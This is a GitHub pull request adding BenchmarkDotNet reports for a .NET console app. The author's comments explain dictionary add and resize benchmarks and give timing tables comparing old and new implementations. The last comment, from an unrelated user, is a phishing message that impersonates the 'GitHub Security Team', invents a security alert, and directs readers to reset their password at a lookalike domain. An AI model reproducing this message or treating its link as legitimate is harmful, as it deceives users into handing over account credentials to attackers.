### PR TITLE
adding reports

### PR DESCRIPTION
**Pull request by maryamariyan**

### CODE REVIEW

File: ConsoleApp6/reports/set1/MyBenchmarks.IntroIParam-report.html [hunk 1]
```diff
@@ -0,0 +1,38 @@
...
+Frequency=2156248 Hz, Resolution=463.7685 ns, Timer=TSC
+.NET Core SDK=2.1.4
+  [Host]     : .NET Core 2.0.5 (Framework 4.6.26020.03), 64bit RyuJIT
+  DefaultJob : .NET Core 2.0.5 (Framework 4.6.26020.03), 64bit RyuJIT
+</code></pre>
+<pre><code></code></pre>
+
+<table>
+<thead><tr><th>Method</th><th>                                 Field</th><th>Mean</th><th>Error</th><th>StdDev</th><th>Median</th>
+</tr>
```
Comment (maryamariyan) [inline ConsoleApp6/reports/set1/MyBenchmarks.IntroIParam-report.html:27]: Explanation:

(WithPercentageAsZombiesAtRandom 0,100,53):
- The setup will create a dictionary with 100 elements in it, and the initial capacity set is not set.
- It removes (100-53=)47 elements from the dictionary with no given bias as to which elements were removed, leaving 47 zombies in the dictionary.
- The benchmark method AddNew will add 53 new elements using newly modified dictionary
- The benchmark method AddOld will add 53 new elements using existing dictionary implementation



(WithPercentageAsZombiesAtRandom 0.5,100,52):
- The setup will create a dictionary with 100 elements in it, and the initial capacity set of (0.5*100=)50.
- It removes (100-52=)48 elements from the dictionary with no given bias as to which elements were removed, leaving 48 zombies in the dictionary.
- The benchmark method AddNew will add 52 new elements using newly modified dictionary
- The benchmark method AddOld will add 52 new elements using existing dictionary implementation

**Comment by maryamariyan** [comment]
This report is checking the time it takes to Resize dictionary to a smaller size.

| Type | Use Case | millisecs | start capacity | initial size | updated capacity | new size | resize to |
| --- | --- | --- | --- | --- | --- | --- | --- |
| Post | A | 70.44ms | 42046 | 10000 | 43627 | 10000 | 21023 |
| Pre | A | 70.82ms | 42046 | 10000 | 43627 | 10000 | 21023 |
| Post | A | 830.43ms | 450614 | 100000 | 467237 | 100000 | 225307 |
| Pre | A | 854.69ms | 450614 | 100000 | 467237 | 100000 | 225307 |
| Post | B | 33.11ms | 42046 | 10000 | 43627 | 5000 | 21023 |
| Pre | B | 33.20ms | 42046 | 10000 | 43627 | 5000 | 21023 |
| Post | B | 392.85ms | 450614 | 100000 | 467237 | 50000 | 225307 |
| Pre | B | 417.53ms | 450614 | 100000 | 467237 | 50000 | 225307 |
| Post | C | 78.42ms | 10000 | 21023 | 75431 | 11023 | 42046 |
| Pre | C | 78.92ms | 10000 | 21023 | 75431 | 11023 | 42046 |
| Post | C | 1059.76ms | 100000 | 225307 | 807403 | 125307 | 450614 |
| Pre | C | 1086.05ms | 100000 | 225307 | 807403 | 125307 | 450614 |


Use Case A:
- Dictionary is full

Use Case B:
- Setup stage: Initial capacity is high, we do some add and then remove to dictionary

Use Case C:
- Setup stage: Initial capacity is low, after add and remove the capacity has increased.

**Comment by maryamariyan** [comment]
Method |                                                                                                 Field |     Mean |     Error |    StdDev |
---------- |------------------------------------------------------------------------------------------------------ |---------:|----------:|----------:|
 ResizeNew | (ZombiesAreScattered startCapacity:100, originalSize:239, curCapacity:239, newSize:239, ResizeTo:521) | 2.717 ms | 0.0600 ms | 0.1749 ms |
 ResizeOld | (ZombiesAreScattered startCapacity:100, originalSize:239, curCapacity:239, newSize:239, ResizeTo:521) | 2.736 ms | 0.0546 ms | 0.1026 ms |

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**

**Pull request closed without merging**